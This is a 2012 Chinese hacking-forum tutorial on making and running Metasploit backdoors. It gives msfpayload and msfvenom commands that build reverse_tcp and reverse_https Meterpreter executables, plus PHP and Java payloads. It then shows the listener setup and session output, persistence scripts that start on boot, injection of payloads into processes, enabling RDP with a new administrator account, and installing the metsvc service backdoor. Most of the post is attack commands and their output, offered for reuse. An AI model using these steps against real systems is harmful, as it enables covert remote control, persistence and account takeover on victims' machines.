切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
11 Metasploit可执行后门[复制链接]
发表于 2012-8-5 20:44:16 | 显示全部楼层 |!read_mode!

他能生成LINUX  WINDOWS PHP ASP JSP等等的后门哦

msfpayload as shellcode

查看全部列表 目前有:248 蛋


  1. root@Dis9Team:/home/brk# msfpayload -l
复制代码

他能生成多种多样的
简单的来说一个

正常的Windows后门:用的是:windows/meterpreter/reverse_tcp

  1. msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  2.   msfencode -b '' -t exe -o /var/www/meterpreter.exe
复制代码
生成以后让目标运行 我们需要进行监听,或者SHELL
  1. msf > use exploit/multi/handler
  2. msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. PAYLOAD => windows/meterpreter/reverse_tcp
  4. msf  exploit(handler) > set LHOST 5.5.5.1
  5. LHOST => 5.5.5.1
  6. msf  exploit(handler) > set LPORT 8080
  7. LPORT => 8080
  8. msf  exploit(handler) > exploit

  9. [*] Started reverse handler on 5.5.5.1:8080
  10. [*] Starting the payload handler...
  11. [*] Sending stage (752128 bytes) to 5.5.5.3
  12. [*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

  13. meterpreter >
复制代码
其他(php asp jsp dll)选中你的msfpayload名字,生成,你动的 例如:
Dll:参考: The DLL Hijacking Tutorial
php:
  1. msf payload(bind_php) > generate -t raw -e php/base64
  2. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));
复制代码
JAVA:
  1. ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar
复制代码
不正常的Windows后门说到正常的肯定有不正常的 例如:reverse_https reverse_http
大家都晓得 这东西秒杀防火墙的,在生成的过程中,党意外中断的链接我们可以再继续链接,就像灰鸽子一样,默认是5分钟,你可以设置SessionExpirationTimeout选项为0,代表链接永远不会过期。
  1. brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
  2. brk@Dis9Team:~$ file https.exe
  3. https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
复制代码
现在我们来运行他。
  1. msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
  2. PAYLOAD => windows/meterpreter/reverse_https
  3. msf  exploit(handler) > set LHOST 5.5.5.1
  4. LHOST => 5.5.5.1
  5. msf  exploit(handler) > set LPORT 1111
  6. LPORT => 1111
  7. msf  exploit(handler) > set SessionCommunicationTimeout 0
  8. SessionCommunicationTimeout => 0
  9. msf  exploit(handler) > set ExitOnSession false
  10. ExitOnSession => false
  11. msf  exploit(handler) > exploit -j
  12. [*] Exploit running as background job.

  13. [*] Started HTTPS reverse handler on https://5.5.5.1:1111/
  14. msf  exploit(handler) > [*] Starting the payload handler...
  15. [*] 5.5.5.3:1060 Request received for /AauE...
  16. [*] 5.5.5.3:1060 Staging connection for target /AauE received...
  17. [*] Patched transport at offset 486516...
  18. [*] Patched URL at offset 486248...
  19. [*] Patched Expiration Timeout at offset 641856...
  20. [*] Patched Communication Timeout at offset 641860...
  21. [*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800
复制代码
成功了,多点了一下 两个SHELL 我们吧SHELL绘画删除了
  1. msf  exploit(handler) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                    Connection
  5.   --  ----                   -----------                    ----------
  6.   2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  7.   3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
  8. msf  exploit(handler) > sessions -k 2
  9. [*] Killing session 2
  10. [*] Meterpreter session 2 closed.
  11. msf  exploit(handler) > sessions -k 3
  12. [*] Killing session 3
  13. [*] Meterpreter session 3 closed.
  14. msf  exploit(handler) > sessions

  15. Active sessions
  16. ===============

  17. No active sessions.

  18. msf  exploit(handler) >
复制代码
继续监听:
  1. msf  exploit(handler) > exploit -j
  2. [*] Exploit running as background job.

  3. [*] Started HTTPS reverse handler on https://5.5.5.1:1111/
  4. [*] Starting the payload handler...
  5. msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
  6. [*] 5.5.5.3:1280 Staging connection for target /AauE received...
  7. [*] Patched transport at offset 486516...
  8. [*] Patched URL at offset 486248...
  9. [*] Patched Expiration Timeout at offset 641856...
  10. [*] Patched Communication Timeout at offset 641860...
  11. [*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800
复制代码
继续获得了SHELLpersistence这货是POST EXPLOITS模块的,前提你要有SHELL绘画,创建持续的后门,作为系统服务器启动
先来链接SHELL,查看帮助先:
  1. msf  exploit(handler) > sessions -i 4
  2. meterpreter > run persistence -h
  3. Meterpreter Script for creating a persistent backdoor on a target host.

  4. OPTIONS:

  5.     -A        Automatically start a matching multi/handler to connect to the agent
  6.     -L   Location in target host where to write payload to, if none %TEMP% will be used.
  7.     -P   Payload to use, default is windows/meterpreter/reverse_tcp.
  8.     -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
  9.     -T   Alternate executable template to use
  10.     -U        Automatically start the agent when the User logs on
  11.     -X        Automatically start the agent when the system boots
  12.     -h        This help menu
  13.     -i   The interval in seconds between each connection attempt
  14.     -p   The port on the remote host where Metasploit is listening
  15.     -r   The IP of the system running Metasploit listening for the connect back

  16. meterpreter >
复制代码
下面我们来运行:
  1. meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
  2. [*] Running Persistance Script
  3. [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  4. [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
  5. [*] Persistent agent script is 609512 bytes long
  6. [+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
  7. [*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
  8. [+] Multi/Handler started!
  9. [*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
  10. [+] Agent executed with PID 3280
  11. meterpreter >
复制代码
安装到了 c:\windows 每隔5秒监听端口1234,本机是5.5.5.1
下面我们看看目标机子有什么情况:多了几个VBS,这就是木马鸟,当我们重启或者登录的时候,他会自动运行,如何删除后么?
  1. [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
复制代码
运行他
  1. meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  2. [*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
  3. [*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
复制代码
payload inject射入其他payload。。 例如:
  1. msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
  2. msf  post(payload_inject) >
  3. msf  post(payload_inject) > show options

  4. Module options (post/windows/manage/payload_inject):

  5.    Name     Current Setting                  Required  Description
  6.    ----     ---------------                  --------  -----------
  7.    HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
  8.    LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
  9.    LPORT    4433                             no        Port for Payload to connect to.
  10.    OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
  11.    PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
  12.    PID                                       no        Process Identifier to inject of process to inject payload.
  13.    SESSION                                   yes       The session to run this module on.

  14. msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
  15. PAYLOAD => windows/meterpreter/reverse_https
  16. msf  post(payload_inject) > set LPORT 9999
  17. LPORT => 9999
  18. msf  post(payload_inject) > set TimestampOutput 0
  19. TimestampOutput => 0
  20. msf  post(payload_inject) > set SESSION 5
  21. SESSION => 5
  22. msf  post(payload_inject) > exploit

  23. [*] Running module against DIS9TEAM-A1
  24. [*] Performing Architecture Check
  25. [*] Process found checking Architecture
  26. [+] Process is the same architecture as the payload
  27. [*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
  28. [*] Opening process 1636
  29. [*] Generating payload
  30. [*] Allocating memory in procees 1636
  31. [*] Allocated memory at address 0x00780000, for 363 byte stager
  32. [*] Writing the stager into memory...
  33. [+] Successfully injected payload in to process: 1636
  34. [*] Post module execution completed
  35. msf  post(payload_inject) > sessions

  36. Active sessions
  37. ===============

  38.   Id  Type                   Information                        Connection
  39.   --  ----                   -----------                        ----------
  40.   4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  41.   5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

  42. msf  post(payload_inject) >
复制代码

TCP Shell Session根据目标安装的脚本设置后门。。有auto, ruby, python, perl, bash,LINUX下也行
因为我啥子都木装 所以。。。 你动的
  1. msf  post(system_session) > show options

  2. Module options (post/multi/manage/system_session):

  3.    Name     Current Setting  Required  Description
  4.    ----     ---------------  --------  -----------
  5.    HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
  6.    LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
  7.    LPORT    4433             no        Port for Payload to connect to.
  8.    SESSION                   yes       The session to run this module on.
  9.    TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

  10. msf  post(system_session) > set HANDLER true
  11. HANDLER => true
  12. msf  post(system_session) > sessions

  13. Active sessions
  14. ===============

  15.   Id  Type                   Information                        Connection
  16.   --  ----                   -----------                        ----------
  17.   4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  18.   5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

  19. msf  post(system_session) > set SESSION 5
  20. SESSION => 5
  21. msf  post(system_session) > exploit
  22. [-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
  23. msf  post(system_session) > set TYPE bash
  24. TYPE => bash
  25. msf  post(system_session) > exploit

  26. [*] Starting exploit multi handler
  27. [*] Started reverse handler on 5.5.5.1:4433
  28. [*] Starting the payload handler...
  29. [*] Post module execution completed
  30. msf  post(system_session) > set TYPE python
  31. TYPE => python
  32. msf  post(system_session) > exploit

  33. [*] Starting exploit multi handler
  34. [-] Job 4 is listening on IP 5.5.5.1 and port 4433
  35. [-] Could not start handler!
  36. [-] A job is listening on the same Port
  37. [*] Post module execution completed
  38. msf  post(system_session) > set LPORT 5555
  39. LPORT => 5555
  40. msf  post(system_session) > exploit

  41. [*] Starting exploit multi handler
  42. [*] Started reverse handler on 5.5.5.1:5555
  43. [*] Starting the payload handler...
  44. [*] Post module execution completed
  45. msf  post(system_session) >
复制代码
pxexploit看说明:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
没条件 所以不演示了
自动3389很简单,进入模块设置帐号密码。 端口。
  1. msf  post(enable_rdp) > show options

  2. Module options (post/windows/manage/enable_rdp):

  3.    Name      Current Setting  Required  Description
  4.    ----      ---------------  --------  -----------
  5.    ENABLE    true             no        Enable the RDP Service and Firewall Exception.
  6.    FORDWARD  false            no        Forward remote port 3389 to local Port.
  7.    LPORT     3389             no        Local port to fordward remote connection.
  8.    PASSWORD                   no        Password for the user created.
  9.    SESSION                    yes       The session to run this module on.
  10.    USERNAME                   no        The username of the user to create.

  11. msf  post(enable_rdp) > set USERNAME test
  12. USERNAME => test
  13. msf  post(enable_rdp) > set PASSWORD test
  14. PASSWORD => test
  15. msf  post(enable_rdp) > set SESSION 5
  16. SESSION => 5
  17. msf  post(enable_rdp) > exploit

  18. [*] Enabling Remote Desktop
  19. [*]         RDP is disabled; enabling it ...
  20. [*] Setting Terminal Services service startup mode
  21. [*]         The Terminal Services service is not set to auto, changing it to auto ...
  22. [*]         Opening port in local firewall if necessary
  23. [*] Setting user account for logon
  24. [*]         Adding User: test with Password: test
  25. [*]         Adding User: test to local group 'Remote Desktop Users'
  26. [*]         Adding User: test to local group 'Administrators'
  27. [*] You can now login with the created user
  28. [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
  29. [*] Post module execution completed
  30. msf  post(enable_rdp) >
复制代码
看看3389开了木???
  1. msf  post(enable_rdp) > nc -v 5.5.5.3 3389
  2. [*] exec: nc -v 5.5.5.3 3389

  3. Connection to 5.5.5.3 3389 port [tcp/*] succeeded!
复制代码
开了,你当然也能换其他端口Inject in Memory这货很牛B,内存射入
  1. msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
  2. msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. msf  post(multi_meterpreter_inject) > set HANDLER true
  4. HANDLER => true
  5. msf  post(multi_meterpreter_inject) > set LPORT 5624
  6. LPORT => 5624
  7. msf  post(multi_meterpreter_inject) > exploit

  8. [*] Running module against DIS9TEAM-A1
  9. [*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
  10. [+] Multi/Handler started!
  11. [*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
  12. [+] Starting Notepad.exe to house Meterpreter Session.
  13. [+] Process created with pid 1168
  14. [*] Injecting meterpreter into process ID 1168
  15. [*] Allocated memory at address 0x00780000, for 290 byte stager
  16. [*] Writing the stager into memory...
  17. [+] Successfully injected Meterpreter in to process: 1168
  18. [*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
  19. [*] Post module execution completed
  20. msf  post(multi_meterpreter_inject) >
复制代码
成功获得了SHELL,metsvc door作为系统服务启动的
首先获得工具:
  1. brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
  2. --2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
  3. 正在解析主机 www.phreedom.org... 66.45.226.226
  4. 正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
  5. 已发出 HTTP 请求,正在等待回应... 200 OK
  6. 长度: 55871 (55K) [application/zip]
  7. 正在保存至: “metsvc-1.0.zip”

  8. 100%[======================================>] 55,871      46.2K/s   花时 1.2s  

  9. 2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

  10. brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
  11. Archive:  metsvc-1.0.zip
  12.    creating: metsvc-1.0/
  13.   inflating: metsvc-1.0/ChangeLog.txt
  14.   inflating: metsvc-1.0/metsvc-server.exe
  15.   inflating: metsvc-1.0/metsvc.exe
  16.   inflating: metsvc-1.0/README.txt
  17.    creating: metsvc-1.0/src/
  18.   inflating: metsvc-1.0/src/Makefile
  19.   inflating: metsvc-1.0/src/metsvc-server.cpp
  20.   inflating: metsvc-1.0/src/metsvc.cpp
  21.   inflating: metsvc-1.0/src/metsvc.h
  22.   inflating: metsvc-1.0/test.rb
  23. brk@Dis9Team:/tmp$ cd metsvc-1.0/
  24. brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
  25. metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
  26. meterpreter.jar    metsrv.dll         metsvc.exe
  27. brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
  28. brk@Dis9Team:/tmp/metsvc-1.0$ ls
  29. ChangeLog.txt  metsvc.exe         README.txt  test.rb
  30. metsrv.dll     metsvc-server.exe  src
  31. brk@Dis9Team:/tmp/metsvc-1.0$
复制代码
然后上传:
  1. meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
  2. [*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
  3. [*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
  4. meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
  5. [*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
  6. [*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
  7. meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
  8. [*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
  9. [*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
  10. meterpreter >
复制代码
安装服务:
  1. meterpreter > shell
  2. Process 2632 created.
  3. Channel 6 created.
  4. Microsoft Windows XP [�汾 5.1.2600]
  5. (C) ��Ȩ���� 1985-2001 Microsoft Corp.

  6. c:\windows>metsvc.exe install-service
  7. metsvc.exe install-service
  8. * Installing service metsvc
  9. * Starting service
  10. Service metsvc successfully installed.

  11. c:\windows>
复制代码
然后你懂的:
  1. msf > use exploit/multi/handler
  2. msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
  3. PAYLOAD => windows/metsvc_bind_tcp
  4. msf  exploit(handler) > set LPORT 31337
  5. LPORT => 31337
  6. msf  exploit(handler) > set RHOST 5.5.5.3
  7. RHOST => 5.5.5.3
  8. msf  exploit(handler) > exploit

  9. [-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
  10. [*] Started bind handler
  11. [*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

  12. meterpreter >
复制代码

结束语还有很多东西想介绍 但是没时间搭建环境 所以写道这里



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-29 09:21

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部